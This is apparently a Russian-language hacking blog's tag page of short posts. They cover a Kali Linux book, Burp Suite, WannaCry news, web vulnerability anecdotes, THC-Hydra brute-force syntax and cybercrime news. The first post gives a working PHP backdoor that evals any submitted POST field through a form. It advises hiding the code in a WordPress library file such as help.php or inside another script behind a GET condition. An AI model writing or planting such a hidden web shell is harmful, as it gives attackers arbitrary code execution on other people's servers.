хакеры

Простейший backdoor

Данный код основан на встроенной функции eval(), которая выполняет строку как php-код. Можно вставить этот код куда-нибудь поглубже. Например, в какую-нибудь библиотеку, типа "/wp-includes/js/tinymce/help.php". Можно вставить этот код не в отдельный файл, а во внутрь какого-нибудь скрипта, только с условием типа if (isset($_GET['eval'])) ...

<?php
if (isset($_POST['code'])) {
    eval(
$_POST['code']);
}
?>

<form action="" method="post">
<textarea name="code"></textarea><br />
<input type="submit" value="Отправить" />
</form>

Книга "Kali Linux Revealed"

Недавно (этим летом) вышло первое издание книги «Kali Linux Revealed: Mastering the Penetration Testing Distribution». Она посвящена работе в Kali Linux. Книгу на английском можно купить на Amazon, её можно читать онлайн или скачать в виде pdf-файла.

Основы работы с Burp Suite

Burp Suite - это интегрированная программа, предназначенная для проведения атак на веб-приложения. Burp Suite включает в себя разнообразные утилиты со специально спроектированным интерфейсом, позволяющими улучшить и ускорить процесс атаки на веб-сайты. Все эти инструменты основываются на мощном фреймворке, который позволяет им перехватывать и показывать пользователю HTTP и HTTPS сообщения, работать с аутентификацией, прокси-серверами и производить логирование различных данных.

Эпидемия вируса-шифровальщика (вымогателя) Wana Decrypt0r 2.0

В пятницу, 12 мая, многие организации по всей Европе и Азии подверглись масштабной кибератаке с использованием ранее неизвестной вредоносной программы. По данным экспертов, больше всех атака вируса затронула серверы на территории России и Тайваня.

По данным влиятельной группы экспертов по кибербезопасности MalwareHunterTeam, больше всех в результате атаки вируса пострадали серверы на территории России и Тайваня.

Open Redirect на различных форумах и блогах

Неделю назад мне сделали заказ на поиск уязвимостей на одном сайте. Сайт был предоставлен в исходных кодах и я имел полный доступ к файлам и базе данных... Но на сайте я почти ничего стоящего не нашел. Но вот в коде блога и форума нашел несколько уязвимостей XSS и Open Redirect... Форум был стандартный и пользуясь поиском Google я нашел примерно 100 с лишним сайтов с подобной уязвимостью. Я написал письма админам сайтов, они пообещали все скоро исправить.

Поэтому регулярно обновляйте скрипты стандартных форумов и блогов! Не ленитесь. Этим вы обезопасите себя и своих клиентов!

Примеры SQL Инъекций в Ruby On Rails

Недавно мне сделали заказ на тестирование веб-приложения на Ruby On Rails. И я нашел там несколько уязвимостей типа SQL инъекции. Для примеров SQL Инъекций в Ruby On Rails я взял справочный сайт http://rails-sqli.org/, который очень помог найти брешь в приложении. Многие думают, что уязвимостей в Ruby On Rails почти уже нет, но это не так... Кто ищет, тот находит! :-)

Уязвимости в последних версиях CMS 1С-Битрикс и видео атаки

16 января 2017 г. на Habrahabr'е была опубликована новый пост об  уязвимостях в последних версиях CMS 1С-Битрикс и видео атаки. Это сразу привлекло мое внимание :-) Так как я сам много раз находил и нахожу множественные XSS уязвимости в различных версиях 1С-Битрикс.

Небольшая цитата с поста:

BruteForce с помощью THC-Hydra

Если нужен brute force, то Вам поможет THC-Hydra. Она поддерживает подбор для: TELNET, FTP, HTTP-GET, HTTP-HEAD, HTTPS-GET, HTTPS-HEAD, HTTP-PROXY, LDAP2, LADP3, SMB, SMBNT, MS-SQL, MYSQL, POSTGRES, REXEC, RSH, RLOGIN, CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, ICQ, SAP/R3, SSH2, Teamspeak, Cisco auth, Cisco enable, Cisco AAA и др.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SOuvVd46] [service://server[:PORT][/OPT]]

Глава международной хакерской группировки арестован в Нигерии

Благодаря совместным усилиям Интерпола и Комиссии по экономическим и финансовым преступлениям Нигерии в городе Порт-Харкорт арестован глава международной ОПГ, руководивший многочисленными операциями в нескольких странах. 40-летнему подозреваемому, известному под ником «Майк», инкриминируют сотни эпизодов Интернет-мошенничества. Общий ущерб от действий ОПГ составил около $60 млн, притом в одном из случаев жертва лишилась $15,4 млн разом.

АНБ пытается взломать российских хакеров

Американские хакеры из АНБ (Агенство Национальной Безопасности), вероятно, пытаются взломать российские хакерские группировки, чтобы выяснить их причастность к взлому серверов Демократической партии США. Об этом сообщает ABC News со ссылкой на источники в американской разведке.

Глава управления операциями по законному доступу АНБ Роберт Джойс ранее не стал комментировать взлом Демократической партии, однако отметил, что у АНБ есть технические возможности и разрешения для того, чтобы «взломать в ответ» причастные хакерские группировки.

RSS-материал